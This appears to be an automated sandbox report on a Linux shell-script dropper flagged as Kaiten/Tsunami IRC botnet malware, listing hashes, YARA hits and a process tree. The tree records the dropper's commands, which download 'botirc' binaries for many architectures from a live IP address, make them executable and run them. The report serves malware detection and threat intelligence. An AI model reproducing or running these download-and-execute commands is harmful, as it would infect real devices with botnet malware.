Analysis
- max time kernel: 149s
- max time network: 187s
- platform: debian-9_armhf
- resource: debian9-armhf-20240611-en
- resource tags: arch:armhf image:debian9-armhf-20240611-en kernel:4.9.0-13-armmp-lpae locale:en-us os:debian-9-armhf system
- submitted: 22-08-2024 01:05
Static task
- static1
Behavioral task behavioral1
- Sample: 10795dd5d92ebda288692b36bb0197f1b3a21351984046c94d84cba7c1c88273.sh
- Resource: ubuntu1804-amd64-20240508-en
Behavioral task behavioral2
- Sample: 10795dd5d92ebda288692b36bb0197f1b3a21351984046c94d84cba7c1c88273.sh
- Resource: debian9-armhf-20240611-en
Behavioral task behavioral3
- Sample: 10795dd5d92ebda288692b36bb0197f1b3a21351984046c94d84cba7c1c88273.sh
- Resource: debian9-mipsbe-20240611-en
General
- Target: 10795dd5d92ebda288692b36bb0197f1b3a21351984046c94d84cba7c1c88273.sh
- Size: 1KB
- MD5: b9befa17ec3fd1f1e6578a484a24d5f2
- SHA1: bacbd92599131e2633a7780540677b859d3f62e0
- SHA256: 10795dd5d92ebda288692b36bb0197f1b3a21351984046c94d84cba7c1c88273
- SHA512: 6bd3e394a9d364d3316f01b19b2b23439ca1b048850502d8778f9de76db75739f108d67de271bb119a69181cbdfe998d7afcb6a3dda7ff1ae1ffdad3d4c0a6a9
Malware Config
Signatures
- Detects Kaiten/Tsunami Payload (11 IoCs)
  resource | yara_rule
  behavioral2/files/fstream-1.dat | family_kaiten2
  behavioral2/files/fstream-3.dat | family_kaiten2
  behavioral2/files/fstream-4.dat | family_kaiten2
  behavioral2/files/fstream-5.dat | family_kaiten2
  behavioral2/files/fstream-6.dat | family_kaiten2
  behavioral2/files/fstream-7.dat | family_kaiten2
  behavioral2/files/fstream-8.dat | family_kaiten2
  behavioral2/files/fstream-9.dat | family_kaiten2
  behavioral2/files/fstream-10.dat | family_kaiten2
  behavioral2/files/fstream-11.dat | family_kaiten2
  behavioral2/files/fstream-12.dat | family_kaiten2
- Executes dropped EXE (11 IoCs)
  ioc | pid | Process
  /tmp/driver.eth0 | 681 | driver.eth0
  /tmp/driver.eth0 | 691 | driver.eth0
  /tmp/driver.eth0 | 696 | driver.eth0
  /tmp/driver.eth0 | 709 | driver.eth0
  /tmp/driver.eth0 | 723 | driver.eth0
  /tmp/driver.eth0 | 736 | driver.eth0
  /tmp/driver.eth0 | 750 | driver.eth0
  /tmp/driver.eth0 | 765 | driver.eth0
  /tmp/driver.eth0 | 773 | driver.eth0
  /tmp/driver.eth0 | 783 | driver.eth0
  /tmp/driver.eth0 | 798 | driver.eth0
- Reads runtime system information (11 IoCs)
  Reads data from the /proc virtual filesystem.
  description | ioc | Process
  File opened for reading | /proc/filesystems | mv (11 identical rows, one per mv invocation)
- Writes file to tmp directory (11 IoCs)
  Malware often drops required files in the /tmp directory.
  description | ioc | Process
  File opened for modification | /tmp/botirc.m68k | wget
  File opened for modification | /tmp/botirc.mpsl | wget
  File opened for modification | /tmp/botirc.ppc | wget
  File opened for modification | /tmp/botirc.sh4 | wget
  File opened for modification | /tmp/botirc.arm6 | wget
  File opened for modification | /tmp/botirc.i686 | wget
  File opened for modification | /tmp/botirc.arm5 | wget
  File opened for modification | /tmp/botirc.arm | wget
  File opened for modification | /tmp/botirc.x86 | wget
  File opened for modification | /tmp/botirc.mips | wget
  File opened for modification | /tmp/botirc.arm7 | wget
Processes
(process tree: path (PID): command line [signatures triggered]; children are indented under their parent)
- /tmp/10795dd5d92ebda288692b36bb0197f1b3a21351984046c94d84cba7c1c88273.sh (PID 655): /tmp/10795dd5d92ebda288692b36bb0197f1b3a21351984046c94d84cba7c1c88273.sh
  - /usr/bin/wget (PID 657): wget http://176.123.1.32/botirc.mips [Writes file to tmp directory]
  - /bin/chmod (PID 678): chmod 777 botirc.mips
  - /bin/mv (PID 680): mv botirc.mips driver.eth0 [Reads runtime system information]
  - /tmp/driver.eth0 (PID 681): ./driver.eth0 [Executes dropped EXE]
  - /usr/bin/wget (PID 684): wget http://176.123.1.32/botirc.arm7 [Writes file to tmp directory]
  - /bin/chmod (PID 689): chmod 777 botirc.arm7
  - /bin/mv (PID 690): mv botirc.arm7 driver.eth0 [Reads runtime system information]
  - /tmp/driver.eth0 (PID 691): ./driver.eth0 [Executes dropped EXE]
  - /usr/bin/wget (PID 693): wget http://176.123.1.32/botirc.arm5 [Writes file to tmp directory]
  - /bin/chmod (PID 694): chmod 777 botirc.arm5
  - /bin/mv (PID 695): mv botirc.arm5 driver.eth0 [Reads runtime system information]
  - /tmp/driver.eth0 (PID 696): ./driver.eth0 [Executes dropped EXE]
  - /usr/bin/wget (PID 697): wget http://176.123.1.32/botirc.arm6 [Writes file to tmp directory]
  - /bin/chmod (PID 706): chmod 777 botirc.arm6
  - /bin/mv (PID 707): mv botirc.arm6 driver.eth0 [Reads runtime system information]
  - /tmp/driver.eth0 (PID 709): ./driver.eth0 [Executes dropped EXE]
  - /usr/bin/wget (PID 711): wget http://176.123.1.32/botirc.arm [Writes file to tmp directory]
  - /bin/chmod (PID 719): chmod 777 botirc.arm
  - /bin/mv (PID 721): mv botirc.arm driver.eth0 [Reads runtime system information]
  - /tmp/driver.eth0 (PID 723): ./driver.eth0 [Executes dropped EXE]
  - /usr/bin/wget (PID 725): wget http://176.123.1.32/botirc.i686 [Writes file to tmp directory]
  - /bin/chmod (PID 732): chmod 777 botirc.i686
  - /bin/mv (PID 734): mv botirc.i686 driver.eth0 [Reads runtime system information]
  - /tmp/driver.eth0 (PID 736): ./driver.eth0 [Executes dropped EXE]
  - /usr/bin/wget (PID 738): wget http://176.123.1.32/botirc.m68k [Writes file to tmp directory]
  - /bin/chmod (PID 746): chmod 777 botirc.m68k
  - /bin/mv (PID 747): mv botirc.m68k driver.eth0 [Reads runtime system information]
  - /tmp/driver.eth0 (PID 750): ./driver.eth0 [Executes dropped EXE]
  - /usr/bin/wget (PID 754): wget http://176.123.1.32/botirc.mpsl [Writes file to tmp directory]
  - /bin/chmod (PID 763): chmod 777 botirc.mpsl
  - /bin/mv (PID 764): mv botirc.mpsl driver.eth0 [Reads runtime system information]
  - /tmp/driver.eth0 (PID 765): ./driver.eth0 [Executes dropped EXE]
  - /usr/bin/wget (PID 767): wget http://176.123.1.32/botirc.ppc [Writes file to tmp directory]
  - /bin/chmod (PID 771): chmod 777 botirc.ppc
  - /bin/mv (PID 772): mv botirc.ppc driver.eth0 [Reads runtime system information]
  - /tmp/driver.eth0 (PID 773): ./driver.eth0 [Executes dropped EXE]
  - /usr/bin/wget (PID 775): wget http://176.123.1.32/botirc.sh4 [Writes file to tmp directory]
  - /bin/chmod (PID 780): chmod 777 botirc.sh4
  - /bin/mv (PID 781): mv botirc.sh4 driver.eth0 [Reads runtime system information]
  - /tmp/driver.eth0 (PID 783): ./driver.eth0 [Executes dropped EXE]
  - /usr/bin/wget (PID 787): wget http://176.123.1.32/botirc.x86 [Writes file to tmp directory]
  - /bin/chmod (PID 794): chmod 777 botirc.x86
  - /bin/mv (PID 796): mv botirc.x86 driver.eth0 [Reads runtime system information]
  - /tmp/driver.eth0 (PID 798): ./driver.eth0 [Executes dropped EXE]
Network
MITRE ATT&CK Matrix
Downloads